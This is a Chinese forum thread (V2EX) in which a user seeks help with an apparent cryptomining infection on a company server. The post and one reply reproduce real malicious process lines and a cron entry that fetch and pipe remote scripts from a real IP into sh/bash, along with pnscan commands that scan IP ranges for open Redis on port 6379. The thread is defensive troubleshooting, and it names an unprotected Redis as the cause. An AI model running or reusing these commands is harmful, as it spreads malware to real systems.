V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
aSmallNewbie
V2EX  ›  Java

兄弟们,公司内网好像中病毒了,怎么解决啊,求助求助啊

  •  
  •   aSmallNewbie · 2020-01-14 14:50:41 +08:00 · 4531 次点击
    这是一个创建于 1809 天前的主题,其中的信息可能已经有所发展或是发生改变。

    root 2147 2838 1 14:42 ? 00:00:00 /usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a 172.108.0.0/16 6379 root 2379 1 0 12:45 ? 00:00:00 /bin/sh -c curl -fsSL http://116.62.122.90/sh.sh/ash.sh|sh root 2381 2379 0 12:45 ? 00:00:00 sh root 2409 1 0 12:45 ? 00:00:00 systemd
    root 2650 2381 0 12:45 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/bsh.sh|bash root 2652 2650 0 12:45 ? 00:00:00 bash root 2836 2652 0 12:46 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/rsh.sh|sh root 2838 2836 0 12:46 ? 00:00:00 sh root 3180 1893 0 14:42 pts/0 00:00:00 ps -ef root 11431 24106 0 13:43 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/rsh.sh|sh root 11433 11431 0 13:43 ? 00:00:00 sh root 17489 1 0 13:15 ? 00:00:00 /bin/sh -c curl -fsSL http://116.62.122.90/sh.sh/ash.sh|sh root 17491 17489 0 13:15 ? 00:00:00 sh root 19785 17491 0 13:15 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/bsh.sh|bash root 19787 19785 0 13:15 ? 00:00:00 bash root 24104 31056 0 13:40 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/bsh.sh|bash root 24106 24104 0 13:40 ? 00:00:00 bash root 29590 1 0 13:00 ? 00:00:00 /bin/sh -c curl -fsSL http://116.62.122.90/sh.sh/ash.sh|sh root 29592 29590 0 13:00 ? 00:00:00 sh root 29836 29592 0 13:00 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/bsh.sh|bash root 29838 29836 0 13:00 ? 00:00:00 bash root 30220 19787 0 13:18 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/rsh.sh|sh root 30222 30220 0 13:18 ? 00:00:00 sh root 31054 1 0 13:30 ? 00:00:00 /bin/sh -c curl -fsSL http://116.62.122.90/sh.sh/ash.sh|sh root 31056 31054 0 13:30 ? 00:00:00 sh root 31492 632 2 14:42 ? 00:00:00 /usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a 137.152.0.0/16 6379 root 32517 30222 2 14:42 ? 00:00:00 /usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a 100.47.0.0/16 6379

    root 2650 2381 0 12:45 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/bsh.sh|bash 这个命令开机就开始跑 还他妈卸载我的 proc 文件系统,软件都跑不起了,怎么找到他在哪里啊 ,妈的我快气死了

    13 条回复    2020-01-15 09:50:28 +08:00
    smartwusir007
        1
    smartwusir007  
       2020-01-14 14:52:05 +08:00
    哈哈,挖矿病毒
    smartwusir007
        2
    smartwusir007  
       2020-01-14 14:56:27 +08:00
    是不是有很多 cron 进程,关掉了还会重启?你看看 redis 是不是开放了外网端口,没设密码?关掉试试
    aSmallNewbie
        3
    aSmallNewbie  
    OP
       2020-01-14 14:56:31 +08:00
    @smartwusir007 对啊,我找不到他怎么自动启动起来
    aSmallNewbie
        4
    aSmallNewbie  
    OP
       2020-01-14 14:56:52 +08:00
    @smartwusir007 我去试下
    tankren
        5
    tankren  
       2020-01-14 15:01:04 +08:00   ❤️ 2
    断网 先把 wget curl 卸载 再慢慢找
    上次看到一个帖子 www 账号下去看 cron
    aSmallNewbie
        6
    aSmallNewbie  
    OP
       2020-01-14 15:05:01 +08:00
    @tankren 流弊啊,果然在大佬,流弊


    */15 * * * * curl -fsSL http://116.62.122.90/sh.sh/ash.sh|sh
    确实在定时任务里,找的我好苦啊
    z1154505909
        7
    z1154505909  
       2020-01-14 15:38:44 +08:00
    我公司的内部服务器也中过挖矿,
    同事说定时任务没跑,直接去找定时任务的日志,看到一个莫名奇妙的定时任务在跑.还老报错,
    看了下文件,复制代码上网上搜了一下,挖矿的,清理了一圈,
    原因就是 redis 没有设置密码,
    以前都没有映射外网端口所以一直没事,后面因为一个项目要测试,开了一下,中招了
    Xusually
        8
    Xusually  
       2020-01-14 15:48:38 +08:00
    这恶意脚本还是托管在阿里云的,不去举报投诉一下?
    aSmallNewbie
        9
    aSmallNewbie  
    OP
       2020-01-14 16:19:58 +08:00
    @Xusually 我们这是公司内网,映射到外网出了问题
    JoyBanana
        10
    JoyBanana  
       2020-01-14 16:20:36 +08:00 via Android
    论 redis 设置密码的重要性
    Xusually
        11
    Xusually  
       2020-01-14 16:24:15 +08:00
    @aSmallNewbie 嗯 我知道,我是说这个恶意脚本以及其他资源是托管在阿里云的服务器上的,你找阿里云举报一下,他的这些作恶的资源可能阿里云会封停
    ps1aniuge
        12
    ps1aniuge  
       2020-01-14 16:45:20 +08:00
    1 随着 linux 被挂马,被挖矿,被勒索增多。快过年之前,广大 it 安全督察人员(信息部锦衣卫)行动起来了,我很欣慰。
    2 还有人讨厌 win 每月更新补丁么?
    3 还在开门后一走了之?无门卫?
    hfc
        13
    hfc  
       2020-01-15 09:50:28 +08:00
    hosts 里把目标 ip 重定向到 127.0.0.1
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   922 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 21:24 · PVG 05:24 · LAX 13:24 · JFK 16:24
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.